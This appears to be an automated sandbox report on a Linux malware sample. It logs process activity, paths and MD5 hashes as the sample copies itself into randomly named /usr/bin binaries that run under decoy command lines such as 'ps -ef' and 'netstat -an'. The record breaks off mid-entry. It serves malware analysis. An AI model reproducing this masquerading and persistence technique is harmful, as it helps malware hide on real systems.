Start time (UTC):	15:53:11
Start date (UTC):	29/10/2023
Path:	/usr/bin/drdxrfohux
Arguments:	/usr/bin/drdxrfohux "ps -ef" 6209
File size:	625900 bytes
MD5 hash:	fae507cacb8ef11ece2641d2443b133c

Chronological Activities

Analysis Process: drdxrfohux PID: 6437, Parent PID: 6431

General

Start time (UTC):	15:53:11
Start date (UTC):	29/10/2023
Path:	/usr/bin/drdxrfohux
Arguments:	-
File size:	625900 bytes
MD5 hash:	fae507cacb8ef11ece2641d2443b133c

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6432, Parent PID: 6209

General

Start time (UTC):	15:53:11
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6434, Parent PID: 6432

General

Start time (UTC):	15:53:11
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: drdxrfohux PID: 6434, Parent PID: 1860

General

Start time (UTC):	15:53:11
Start date (UTC):	29/10/2023
Path:	/usr/bin/drdxrfohux
Arguments:	/usr/bin/drdxrfohux ls 6209
File size:	625900 bytes
MD5 hash:	fae507cacb8ef11ece2641d2443b133c

Chronological Activities

Analysis Process: drdxrfohux PID: 6438, Parent PID: 6434

General

Start time (UTC):	15:53:11
Start date (UTC):	29/10/2023
Path:	/usr/bin/drdxrfohux
Arguments:	-
File size:	625900 bytes
MD5 hash:	fae507cacb8ef11ece2641d2443b133c

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6435, Parent PID: 6209

General

Start time (UTC):	15:53:11
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6436, Parent PID: 6435

General

Start time (UTC):	15:53:11
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: drdxrfohux PID: 6436, Parent PID: 1860

General

Start time (UTC):	15:53:11
Start date (UTC):	29/10/2023
Path:	/usr/bin/drdxrfohux
Arguments:	/usr/bin/drdxrfohux "echo \"find\"" 6209
File size:	625900 bytes
MD5 hash:	fae507cacb8ef11ece2641d2443b133c

Chronological Activities

Analysis Process: drdxrfohux PID: 6439, Parent PID: 6436

General

Start time (UTC):	15:53:11
Start date (UTC):	29/10/2023
Path:	/usr/bin/drdxrfohux
Arguments:	-
File size:	625900 bytes
MD5 hash:	fae507cacb8ef11ece2641d2443b133c

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6442, Parent PID: 6209

General

Start time (UTC):	15:53:16
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6443, Parent PID: 6442

General

Start time (UTC):	15:53:16
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: doxgrgkpoa PID: 6443, Parent PID: 6442

General

Start time (UTC):	15:53:16
Start date (UTC):	29/10/2023
Path:	/usr/bin/doxgrgkpoa
Arguments:	/usr/bin/doxgrgkpoa "grep \"A\"" 6209
File size:	625900 bytes
MD5 hash:	554e86fe72f87ddbdc34820e327d739c

Chronological Activities

Analysis Process: doxgrgkpoa PID: 6447, Parent PID: 6443

General

Start time (UTC):	15:53:16
Start date (UTC):	29/10/2023
Path:	/usr/bin/doxgrgkpoa
Arguments:	-
File size:	625900 bytes
MD5 hash:	554e86fe72f87ddbdc34820e327d739c

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6444, Parent PID: 6209

General

Start time (UTC):	15:53:16
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6445, Parent PID: 6444

General

Start time (UTC):	15:53:16
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: doxgrgkpoa PID: 6445, Parent PID: 1860

General

Start time (UTC):	15:53:16
Start date (UTC):	29/10/2023
Path:	/usr/bin/doxgrgkpoa
Arguments:	/usr/bin/doxgrgkpoa top 6209
File size:	625900 bytes
MD5 hash:	554e86fe72f87ddbdc34820e327d739c

Chronological Activities

Analysis Process: doxgrgkpoa PID: 6451, Parent PID: 6445

General

Start time (UTC):	15:53:16
Start date (UTC):	29/10/2023
Path:	/usr/bin/doxgrgkpoa
Arguments:	-
File size:	625900 bytes
MD5 hash:	554e86fe72f87ddbdc34820e327d739c

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6446, Parent PID: 6209

General

Start time (UTC):	15:53:16
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6448, Parent PID: 6446

General

Start time (UTC):	15:53:16
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: doxgrgkpoa PID: 6448, Parent PID: 1860

General

Start time (UTC):	15:53:16
Start date (UTC):	29/10/2023
Path:	/usr/bin/doxgrgkpoa
Arguments:	/usr/bin/doxgrgkpoa "ifconfig eth0" 6209
File size:	625900 bytes
MD5 hash:	554e86fe72f87ddbdc34820e327d739c

Chronological Activities

Analysis Process: doxgrgkpoa PID: 6453, Parent PID: 6448

General

Start time (UTC):	15:53:16
Start date (UTC):	29/10/2023
Path:	/usr/bin/doxgrgkpoa
Arguments:	-
File size:	625900 bytes
MD5 hash:	554e86fe72f87ddbdc34820e327d739c

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6449, Parent PID: 6209

General

Start time (UTC):	15:53:16
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6450, Parent PID: 6449

General

Start time (UTC):	15:53:16
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: doxgrgkpoa PID: 6450, Parent PID: 1860

General

Start time (UTC):	15:53:16
Start date (UTC):	29/10/2023
Path:	/usr/bin/doxgrgkpoa
Arguments:	/usr/bin/doxgrgkpoa "route -n" 6209
File size:	625900 bytes
MD5 hash:	554e86fe72f87ddbdc34820e327d739c

Chronological Activities

Analysis Process: doxgrgkpoa PID: 6455, Parent PID: 6450

General

Start time (UTC):	15:53:16
Start date (UTC):	29/10/2023
Path:	/usr/bin/doxgrgkpoa
Arguments:	-
File size:	625900 bytes
MD5 hash:	554e86fe72f87ddbdc34820e327d739c

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6452, Parent PID: 6209

General

Start time (UTC):	15:53:16
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6454, Parent PID: 6452

General

Start time (UTC):	15:53:16
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: doxgrgkpoa PID: 6454, Parent PID: 1860

General

Start time (UTC):	15:53:16
Start date (UTC):	29/10/2023
Path:	/usr/bin/doxgrgkpoa
Arguments:	/usr/bin/doxgrgkpoa sh 6209
File size:	625900 bytes
MD5 hash:	554e86fe72f87ddbdc34820e327d739c

Chronological Activities

Analysis Process: doxgrgkpoa PID: 6456, Parent PID: 6454

General

Start time (UTC):	15:53:16
Start date (UTC):	29/10/2023
Path:	/usr/bin/doxgrgkpoa
Arguments:	-
File size:	625900 bytes
MD5 hash:	554e86fe72f87ddbdc34820e327d739c

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6459, Parent PID: 6209

General

Start time (UTC):	15:53:21
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6460, Parent PID: 6459

General

Start time (UTC):	15:53:21
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: mntlutgnfs PID: 6460, Parent PID: 6459

General

Start time (UTC):	15:53:21
Start date (UTC):	29/10/2023
Path:	/usr/bin/mntlutgnfs
Arguments:	/usr/bin/mntlutgnfs "echo \"find\"" 6209
File size:	625900 bytes
MD5 hash:	7087cda9340637572e5b22d072b11ffb

Chronological Activities

Analysis Process: mntlutgnfs PID: 6463, Parent PID: 6460

General

Start time (UTC):	15:53:21
Start date (UTC):	29/10/2023
Path:	/usr/bin/mntlutgnfs
Arguments:	-
File size:	625900 bytes
MD5 hash:	7087cda9340637572e5b22d072b11ffb

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6461, Parent PID: 6209

General

Start time (UTC):	15:53:21
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6462, Parent PID: 6461

General

Start time (UTC):	15:53:21
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: mntlutgnfs PID: 6462, Parent PID: 1860

General

Start time (UTC):	15:53:21
Start date (UTC):	29/10/2023
Path:	/usr/bin/mntlutgnfs
Arguments:	/usr/bin/mntlutgnfs "cat resolv.conf" 6209
File size:	625900 bytes
MD5 hash:	7087cda9340637572e5b22d072b11ffb

Chronological Activities

Analysis Process: mntlutgnfs PID: 6467, Parent PID: 6462

General

Start time (UTC):	15:53:21
Start date (UTC):	29/10/2023
Path:	/usr/bin/mntlutgnfs
Arguments:	-
File size:	625900 bytes
MD5 hash:	7087cda9340637572e5b22d072b11ffb

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6464, Parent PID: 6209

General

Start time (UTC):	15:53:21
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6465, Parent PID: 6464

General

Start time (UTC):	15:53:21
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: mntlutgnfs PID: 6465, Parent PID: 1860

General

Start time (UTC):	15:53:21
Start date (UTC):	29/10/2023
Path:	/usr/bin/mntlutgnfs
Arguments:	/usr/bin/mntlutgnfs "ifconfig eth0" 6209
File size:	625900 bytes
MD5 hash:	7087cda9340637572e5b22d072b11ffb

Chronological Activities

Analysis Process: mntlutgnfs PID: 6471, Parent PID: 6465

General

Start time (UTC):	15:53:21
Start date (UTC):	29/10/2023
Path:	/usr/bin/mntlutgnfs
Arguments:	-
File size:	625900 bytes
MD5 hash:	7087cda9340637572e5b22d072b11ffb

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6466, Parent PID: 6209

General

Start time (UTC):	15:53:21
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6468, Parent PID: 6466

General

Start time (UTC):	15:53:21
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: mntlutgnfs PID: 6468, Parent PID: 1860

General

Start time (UTC):	15:53:21
Start date (UTC):	29/10/2023
Path:	/usr/bin/mntlutgnfs
Arguments:	/usr/bin/mntlutgnfs "cat resolv.conf" 6209
File size:	625900 bytes
MD5 hash:	7087cda9340637572e5b22d072b11ffb

Chronological Activities

Analysis Process: mntlutgnfs PID: 6472, Parent PID: 6468

General

Start time (UTC):	15:53:21
Start date (UTC):	29/10/2023
Path:	/usr/bin/mntlutgnfs
Arguments:	-
File size:	625900 bytes
MD5 hash:	7087cda9340637572e5b22d072b11ffb

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6469, Parent PID: 6209

General

Start time (UTC):	15:53:21
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6470, Parent PID: 6469

General

Start time (UTC):	15:53:21
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: mntlutgnfs PID: 6470, Parent PID: 1860

General

Start time (UTC):	15:53:21
Start date (UTC):	29/10/2023
Path:	/usr/bin/mntlutgnfs
Arguments:	/usr/bin/mntlutgnfs "ls -la" 6209
File size:	625900 bytes
MD5 hash:	7087cda9340637572e5b22d072b11ffb

Chronological Activities

Analysis Process: mntlutgnfs PID: 6473, Parent PID: 6470

General

Start time (UTC):	15:53:21
Start date (UTC):	29/10/2023
Path:	/usr/bin/mntlutgnfs
Arguments:	-
File size:	625900 bytes
MD5 hash:	7087cda9340637572e5b22d072b11ffb

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6477, Parent PID: 6209

General

Start time (UTC):	15:53:27
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6478, Parent PID: 6477

General

Start time (UTC):	15:53:27
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: zfzhrlhjxr PID: 6478, Parent PID: 6477

General

Start time (UTC):	15:53:27
Start date (UTC):	29/10/2023
Path:	/usr/bin/zfzhrlhjxr
Arguments:	/usr/bin/zfzhrlhjxr "sleep 1" 6209
File size:	625900 bytes
MD5 hash:	c8a82c85ddea45f8cfbb9b1637defa4f

Chronological Activities

Analysis Process: zfzhrlhjxr PID: 6481, Parent PID: 6478

General

Start time (UTC):	15:53:27
Start date (UTC):	29/10/2023
Path:	/usr/bin/zfzhrlhjxr
Arguments:	-
File size:	625900 bytes
MD5 hash:	c8a82c85ddea45f8cfbb9b1637defa4f

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6479, Parent PID: 6209

General

Start time (UTC):	15:53:27
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6480, Parent PID: 6479

General

Start time (UTC):	15:53:27
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: zfzhrlhjxr PID: 6480, Parent PID: 1860

General

Start time (UTC):	15:53:27
Start date (UTC):	29/10/2023
Path:	/usr/bin/zfzhrlhjxr
Arguments:	/usr/bin/zfzhrlhjxr "netstat -an" 6209
File size:	625900 bytes
MD5 hash:	c8a82c85ddea45f8cfbb9b1637defa4f

Chronological Activities

Analysis Process: zfzhrlhjxr PID: 6486, Parent PID: 6480

General

Start time (UTC):	15:53:27
Start date (UTC):	29/10/2023
Path:	/usr/bin/zfzhrlhjxr
Arguments:	-
File size:	625900 bytes
MD5 hash:	c8a82c85ddea45f8cfbb9b1637defa4f

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6482, Parent PID: 6209

General

Start time (UTC):	15:53:27
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6483, Parent PID: 6482

General

Start time (UTC):	15:53:27
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: zfzhrlhjxr PID: 6483, Parent PID: 1860

General

Start time (UTC):	15:53:27
Start date (UTC):	29/10/2023
Path:	/usr/bin/zfzhrlhjxr
Arguments:	/usr/bin/zfzhrlhjxr "grep \"A\"" 6209
File size:	625900 bytes
MD5 hash:	c8a82c85ddea45f8cfbb9b1637defa4f

Chronological Activities

Analysis Process: zfzhrlhjxr PID: 6489, Parent PID: 6483

General

Start time (UTC):	15:53:27
Start date (UTC):	29/10/2023
Path:	/usr/bin/zfzhrlhjxr
Arguments:	-
File size:	625900 bytes
MD5 hash:	c8a82c85ddea45f8cfbb9b1637defa4f

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6484, Parent PID: 6209

General

Start time (UTC):	15:53:27
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6485, Parent PID: 6484

General

Start time (UTC):	15:53:27
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: zfzhrlhjxr PID: 6485, Parent PID: 1860

General

Start time (UTC):	15:53:27
Start date (UTC):	29/10/2023
Path:	/usr/bin/zfzhrlhjxr
Arguments:	/usr/bin/zfzhrlhjxr uptime 6209
File size:	625900 bytes
MD5 hash:	c8a82c85ddea45f8cfbb9b1637defa4f

Chronological Activities

Analysis Process: zfzhrlhjxr PID: 6490, Parent PID: 6485

General

Start time (UTC):	15:53:27
Start date (UTC):	29/10/2023
Path:	/usr/bin/zfzhrlhjxr
Arguments:	-
File size:	625900 bytes
MD5 hash:	c8a82c85ddea45f8cfbb9b1637defa4f

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6487, Parent PID: 6209

General

Start time (UTC):	15:53:27
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6488, Parent PID: 6487

General

Start time (UTC):	15:53:27
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: zfzhrlhjxr PID: 6488, Parent PID: 1860

General

Start time (UTC):	15:53:27
Start date (UTC):	29/10/2023
Path:	/usr/bin/zfzhrlhjxr
Arguments:	/usr/bin/zfzhrlhjxr "sleep 1" 6209
File size:	625900 bytes
MD5 hash:	c8a82c85ddea45f8cfbb9b1637defa4f

Chronological Activities

Analysis Process: zfzhrlhjxr PID: 6491, Parent PID: 6488

General

Start time (UTC):	15:53:27
Start date (UTC):	29/10/2023
Path:	/usr/bin/zfzhrlhjxr
Arguments:	-
File size:	625900 bytes
MD5 hash:	c8a82c85ddea45f8cfbb9b1637defa4f

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6494, Parent PID: 6209

General

Start time (UTC):	15:53:32
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6495, Parent PID: 6494

General

Start time (UTC):	15:53:32
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: tqdlzqtrvv PID: 6495, Parent PID: 6494

General

Start time (UTC):	15:53:32
Start date (UTC):	29/10/2023
Path:	/usr/bin/tqdlzqtrvv
Arguments:	/usr/bin/tqdlzqtrvv "echo \"find\"" 6209
File size:	625900 bytes
MD5 hash:	08eefc1ac5b84248b8feded042945b0b

Chronological Activities

Analysis Process: tqdlzqtrvv PID: 6498, Parent PID: 6495

General

Start time (UTC):	15:53:32
Start date (UTC):	29/10/2023
Path:	/usr/bin/tqdlzqtrvv
Arguments:	-
File size:	625900 bytes
MD5 hash:	08eefc1ac5b84248b8feded042945b0b

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6496, Parent PID: 6209

General

Start time (UTC):	15:53:32
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6497, Parent PID: 6496

General

Start time (UTC):	15:53:32
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: tqdlzqtrvv PID: 6497, Parent PID: 1860

General

Start time (UTC):	15:53:32
Start date (UTC):	29/10/2023
Path:	/usr/bin/tqdlzqtrvv
Arguments:	/usr/bin/tqdlzqtrvv top 6209
File size:	625900 bytes
MD5 hash:	08eefc1ac5b84248b8feded042945b0b

Chronological Activities

Analysis Process: tqdlzqtrvv PID: 6502, Parent PID: 6497

General

Start time (UTC):	15:53:32
Start date (UTC):	29/10/2023
Path:	/usr/bin/tqdlzqtrvv
Arguments:	-
File size:	625900 bytes
MD5 hash:	08eefc1ac5b84248b8feded042945b0b

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6499, Parent PID: 6209

General

Start time (UTC):	15:53:32
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6500, Parent PID: 6499

General

Start time (UTC):	15:53:32
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: tqdlzqtrvv PID: 6500, Parent PID: 6499

General

Start time (UTC):	15:53:32
Start date (UTC):	29/10/2023
Path:	/usr/bin/tqdlzqtrvv
Arguments:	/usr/bin/tqdlzqtrvv "ls -la" 6209
File size:	625900 bytes
MD5 hash:	08eefc1ac5b84248b8feded042945b0b

Chronological Activities

Analysis Process: tqdlzqtrvv PID: 6504, Parent PID: 6500

General

Start time (UTC):	15:53:32
Start date (UTC):	29/10/2023
Path:	/usr/bin/tqdlzqtrvv
Arguments:	-
File size:	625900 bytes
MD5 hash:	08eefc1ac5b84248b8feded042945b0b

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6501, Parent PID: 6209

General

Start time (UTC):	15:53:32
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6503, Parent PID: 6501

General

Start time (UTC):	15:53:32
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: tqdlzqtrvv PID: 6503, Parent PID: 1860

General

Start time (UTC):	15:53:32
Start date (UTC):	29/10/2023
Path:	/usr/bin/tqdlzqtrvv
Arguments:	/usr/bin/tqdlzqtrvv "grep \"A\"" 6209
File size:	625900 bytes
MD5 hash:	08eefc1ac5b84248b8feded042945b0b

Chronological Activities

Analysis Process: tqdlzqtrvv PID: 6507, Parent PID: 6503

General

Start time (UTC):	15:53:32
Start date (UTC):	29/10/2023
Path:	/usr/bin/tqdlzqtrvv
Arguments:	-
File size:	625900 bytes
MD5 hash:	08eefc1ac5b84248b8feded042945b0b

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6505, Parent PID: 6209

General

Start time (UTC):	15:53:32
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6506, Parent PID: 6505

General

Start time (UTC):	15:53:32
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: tqdlzqtrvv PID: 6506, Parent PID: 1860

General

Start time (UTC):	15:53:32
Start date (UTC):	29/10/2023
Path:	/usr/bin/tqdlzqtrvv
Arguments:	/usr/bin/tqdlzqtrvv "cat resolv.conf" 6209
File size:	625900 bytes
MD5 hash:	08eefc1ac5b84248b8feded042945b0b

Chronological Activities

Analysis Process: tqdlzqtrvv PID: 6508, Parent PID: 6506

General

Start time (UTC):	15:53:32
Start date (UTC):	29/10/2023
Path:	/usr/bin/tqdlzqtrvv
Arguments:	-
File size:	625900 bytes
MD5 hash:	08eefc1ac5b84248b8feded042945b0b

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6514, Parent PID: 6209

General

Start time (UTC):	15:53:37
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6515, Parent PID: 6514

General

Start time (UTC):	15:53:37
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: vigcpbezza PID: 6515, Parent PID: 6514

General

Start time (UTC):	15:53:37
Start date (UTC):	29/10/2023
Path:	/usr/bin/vigcpbezza
Arguments:	/usr/bin/vigcpbezza uptime 6209
File size:	625900 bytes
MD5 hash:	9bbb510e2c2ffad6381fa18d91e42ba7

Chronological Activities

Analysis Process: vigcpbezza PID: 6518, Parent PID: 6515

General

Start time (UTC):	15:53:37
Start date (UTC):	29/10/2023
Path:	/usr/bin/vigcpbezza
Arguments:	-
File size:	625900 bytes
MD5 hash:	9bbb510e2c2ffad6381fa18d91e42ba7

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6516, Parent PID: 6209

General

Start time (UTC):	15:53:37
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6517, Parent PID: 6516

General

Start time (UTC):	15:53:37
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: vigcpbezza PID: 6517, Parent PID: 1860

General

Start time (UTC):	15:53:37
Start date (UTC):	29/10/2023
Path:	/usr/bin/vigcpbezza
Arguments:	/usr/bin/vigcpbezza "route -n" 6209
File size:	625900 bytes
MD5 hash:	9bbb510e2c2ffad6381fa18d91e42ba7

Chronological Activities

Analysis Process: vigcpbezza PID: 6521, Parent PID: 6517

General

Start time (UTC):	15:53:37
Start date (UTC):	29/10/2023
Path:	/usr/bin/vigcpbezza
Arguments:	-
File size:	625900 bytes
MD5 hash:	9bbb510e2c2ffad6381fa18d91e42ba7

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6519, Parent PID: 6209

General

Start time (UTC):	15:53:37
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6520, Parent PID: 6519

General

Start time (UTC):	15:53:37
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
